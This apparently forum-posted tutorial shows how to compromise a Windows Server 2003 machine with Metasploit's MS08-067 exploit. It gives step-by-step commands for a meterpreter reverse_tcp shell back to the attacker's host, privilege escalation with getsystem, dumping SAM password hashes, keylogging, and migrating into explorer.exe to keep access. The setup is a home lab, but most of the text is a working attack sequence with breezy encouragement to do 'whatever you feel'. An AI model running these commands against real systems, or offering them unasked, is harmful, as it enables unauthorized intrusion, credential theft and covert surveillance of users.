Intro to Metasploit: Attacking Windows Server 2003

Hey guys,

Todays tutorial is going to focus on using metasploit to compromise a remote system and gain administrative access. This tutorial will be fairly brief and to the point and is meant to be an intro to metasploit, i'll be following it up with some more thorough tutorials that dive into more detailed use of metasploit and all of its functionality.

What you will need for this tutorial:

    Metasploit (Download: http://www.metasploit.com/download/)
    A target OS(I'm using a VM running windows server 2003, I advise using the same for this tutorial as this particular exploit may not work on some other Operating Systems(In setting up the virtual machine you may need to change the network settings to run in bridged mode, NAT may cause issues in getting the exploit to work))

Once you have metasploit downloaded and installed the first thing you should do is update your version to make sure everythings up to date. On a unix based OS you can do this by opening a terminal and entering the following command:

    sudo msfupdate

be patient as this may take a few minutes to complete, once this is finished we can load up metasploit using this command:

    sudo msfconsole

this can take a few seconds-up to a minute or two so be patient, once it loads you should be presented with a screen similar to the following:



(Note metasploit has a number of banners that it randomly selects at load so it might not look exactly like this, don't fret as long as you see the msf > prompt you're fine)

Metasploit is an awesome tool with a large set of features to help you get information on exploits, auxilleries, etc... command line programs can be intimidating at first glance but once we take a look at some of these features you should feel a lot more comforatable using this interface. For a list of commands type the word help and press enter, this provides us with a complete set of commands and a brief description of their purpose. Another great feature of metasploit is auto-tabbing. That is to say, if you are unsure of an exact command or path you can type the first part of it and hit tab twice, metasploit will then generate a list of all the valid endings. I may be wording this poorly so lets take a look at an example for clarity. The exploit we will be using for this exercise is ms08_067_netapi, the path for it is exploit/windows/smb/ms08_067_netapi but say we only remember it's in exploit/windows/smb we can type:

    use exploit/windows/smb/ms0

followed by tabbing twice and we receive the following list of options in which we see our exploit ms08_067_netapi:



I want to take a step back and briefly explain the command: use exploit/windows/smb/ms08_067_netapi

What we're doing here is selecting a specific exploit that we want to use, once we have entered this command our prompt will change to:
msf exploit(ms08_067_netapi) >
and all further commands we enter will pertain to arming that exploit with a payload and determining its source and destination. A useful command at this point is the info command, by entering info we can view some of the options available, which operating systems the exploit will work on, and a brief writeup on the exploit itself:

Also useful is the 'show options' (without the apostrophes) command which allows you to view a complete set of options that can be set for the exploit. if we enter show options we can see the following options, some of which are already pre-set with defaults:

RHOST
RPORT
SMBPIPE

EXITFUNC
LHOST
LPORT

which all come with a brief description of their purpose. The two we want to set are the RHOST and the LHOST values, these are the IP addresses of our target, and our own station respectively. To set these values we enter these commands(your IP Addresses may be different)

set RHOST 192.168.1.118
set LHOST 192.168.1.147

but we're not finished yet, so far we've found an exploit and we've set our target and local addresses, but we still need a payload. If you're confused about what exactly the difference between an exploit and a payload is: An exploit is a vulnerability in an application, the presence of this vulnerability allows for some type of unauthorized access, in many cases this is a buffer overflow in which foreign shellcode can be pushed onto the stack and executed, the exploit is like a door, it allows passage in, the payload is the shellcode that is being pushed onto the stack. So we can think of the exploit as our doorway in and the payload as the battering ram we use to knock that door down.

we have several options available to us and again we can auto-tab to get a complete set, but in this tutorial we will be using meterpreter as our payload, specifically the reverse_tcp shell. Meterpreter is an awesome tool that comes with metasploit that allows a custom terminal interface to be used on the targetted system, it has a number of advanced options that allow you to escalate priveleges and gain a system user with a few simple commands. To set our payload we enter the following command:

set PAYLOAD windows/meterpreter/reverse_tcp




now we're ready to roll, we can begin by typing the following command:

exploit

Now it will go through a quick process of running the exploit and if all goes well you should be presented with a

meterpreter >



prompt. If you type help you will receive a list of commands you can use from within the meterpreter shell, I suggest briefly looking through them before continuing.

Now that we have access to the target system its time to run some determine some information about the system we've compromised if we enter

sysinfo

we can get detailed information on the operating system and service pack

getprivs
getsystem



with these two commands we can elevate our priveleges and attempt to gain access to a system user

hashdump




will dump the SAM password file providing you with the password hashes of system users

keyscan_start
keyscan_stop
keyscan_dump

are used as keylogging software on the target

There are a number of other cool and awesome tools which is why i highly recommend taking a look through some of the features on your own and playing around a little bit with things. Meterpreter runs by merging itself into a process running on the system, sometimes if that application is closed by a legitimate user on the system it can prematurely end our access to the system, but fear not! There is another tool available to allow you to change which process you're in, and migrate into a process thats not likely to be closed(you know... like explorer.exe) to view a list of available processes running type

ps

it will provide you with a list of processes similar to what you'd see if you opened task manager on a windows system, from here we want to look in the PID column and get the PID of the process we want to migrate to, from there we simply need to type:

migrate PID



in my case this was 1300, now we can double check which our current process is by typing

getpid

if the numbers match up you're golden!

so at this point we have gained access to the system, elevated our priveleges and gained system access. PWNing of the box has completed and you can begin doing whatever you feel, sometimes though you may find that meterpreter doesn't have an exact match to a command you're used to using in a command line, if this is the case you can type

shell

and drop right into a native os shell, to go back to meterpreter simply type

exit

if you have a series of systems you want to compromise at the same time you can background a meterpreter session and return to the metasploit console, and go back into that session at any time. From the meterpreter shell type:

background

then type

sessions

to view active sessions, note the id # of the session you would like to enter back into and type

sessions -i #

(where # is the ID of the session)

You can slso choose to go directly into an OS shell instead of a meterpreter one by using the payload windows/shell/reverse_tcp



As I said at the beginning this wasn't aimed at being a very comprehensive tutorial but rather to just get people familiar with using the basic functions of metasploit and make it a little more accessible to people who havn't had a chance to really dig deep enough into it. I'll be following this up with some examples of using metasploit on UNIX systems as well as diving into some other features like using a custom payload. Hope you all enjoyed it, until next time folks!